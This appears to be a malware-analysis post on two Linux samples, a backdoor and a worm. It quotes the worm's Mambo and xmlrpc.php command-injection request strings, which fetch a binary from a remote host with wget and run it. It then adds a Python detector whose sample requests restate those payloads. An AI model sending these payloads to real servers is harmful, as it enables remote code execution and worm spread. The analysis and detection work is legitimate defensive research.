
New Linux Malware

Two Linux malware samples in the zip.

session: infected: Backdoor.Linux.Keitan.c

derfig: infected: Net-Worm.Linux.Mare.e

The Derfig binary seems to spread via a Mambo vulnerability and an xmlrpc.php vulnerability.

Mambo exploit string from the binary:
GET %sindex2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=;wget%%20209.123.16.34/gicumz;chmod%%20744%%20gicumz;./gicumz;echo%%20YYY;echo| HTTP/1.1

xmlrpc.php exploit string from the binary:
POST %s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
test.method',''));echo '_begin_';echo `cd /tmp;wget;chmod +x gicumz;./gicumz `;echo '_end_';exit;/*

It looks for these vulnerabilities in the following locations:

Both binaries appear to have been built on Red Hat 9 systems, judging from the compiler version strings.
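Detection logic for the two request patterns quoted above, added here as an example (not code from the original post or the malware): it parses a raw HTTP request and flags the Mambo mosConfig_absolute_path command injection and the xmlrpc.php methodName quote injection. The sample requests, the host name and the 203.0.113.9 address are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus, unquote

# Indicators derived from the two request strings quoted in the post. In the
# binary they are printf format strings: "%s" is the target path and "%%20"
# is an escaped "%20", so the request on the wire carries plain "%20".
SHELL_MARKERS = re.compile(r"(;|\||`|\bwget\b|\bchmod\b)", re.I)
METHOD_NAME = re.compile(r"<methodName>(.*?)</methodName>", re.S | re.I)
INJECTED_QUOTE = re.compile(r"""['"`()]""")

# Constructed sample requests (not real captures). 203.0.113.9 is a
# documentation-range placeholder standing in for the worm's download host.
MAMBO_REQ = (
    "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS="
    "&mosConfig_absolute_path=;wget%20203.0.113.9/gicumz;chmod%20744%20gicumz;"
    "./gicumz;echo%20YYY;echo| HTTP/1.1\r\nHost: victim.example\r\n\r\n"
)
XMLRPC_REQ = (
    "POST /xmlrpc.php HTTP/1.1\r\nHost: victim.example\r\n"
    "Content-Type: text/xml\r\n\r\n<?xml version=\"1.0\"?><methodCall>"
    "<methodName>test.method',''));echo '_begin_';echo `cd /tmp;wget;chmod +x "
    "gicumz;./gicumz `;echo '_end_';exit;/*</methodName><params/></methodCall>"
)
BENIGN_REQ = "GET /index.php?option=com_content&Itemid=1 HTTP/1.1\r\nHost: victim.example\r\n\r\n"

def query_params(query):
    """Split on '&' only: ';' is part of the injected command, not a separator
    (older parse_qs versions split on ';' and would hide the payload)."""
    return [tuple(unquote_plus(s) for s in pair.partition("=")[::2])
            for pair in query.split("&") if pair]

def classify(raw):
    """Return [(rule, detail)] hits for one raw HTTP request (empty = clean)."""
    head, _, body = raw.partition("\r\n\r\n")
    method, target = head.split("\r\n")[0].split(" ", 2)[:2]
    url = urlsplit(target)
    hits = []
    # Rule 1: Mambo mosConfig_* parameter carrying shell metacharacters or a
    # downloader; a second unquote catches double-encoded variants.
    for name, value in query_params(url.query):
        if name.lower().startswith("mosconfig_") and SHELL_MARKERS.search(unquote(value)):
            hits.append(("mambo-mosconfig-rce", f"{name}={value[:40]}"))
    # Rule 2: quote/paren injection inside <methodName> of a POST to xmlrpc.php.
    if method == "POST" and url.path.lower().endswith("xmlrpc.php"):
        for m in METHOD_NAME.findall(body):
            if INJECTED_QUOTE.search(m):
                hits.append(("xmlrpc-methodname-injection", m[:40]))
    return hits

if __name__ == "__main__":
    for req in (MAMBO_REQ, XMLRPC_REQ, BENIGN_REQ):
        print(req.split("\r\n")[0][:60], "->", classify(req) or "clean")
```

The same two rules translate directly into a WAF or IDS signature; the important detail is decoding the query before matching and not treating ';' as a parameter separator.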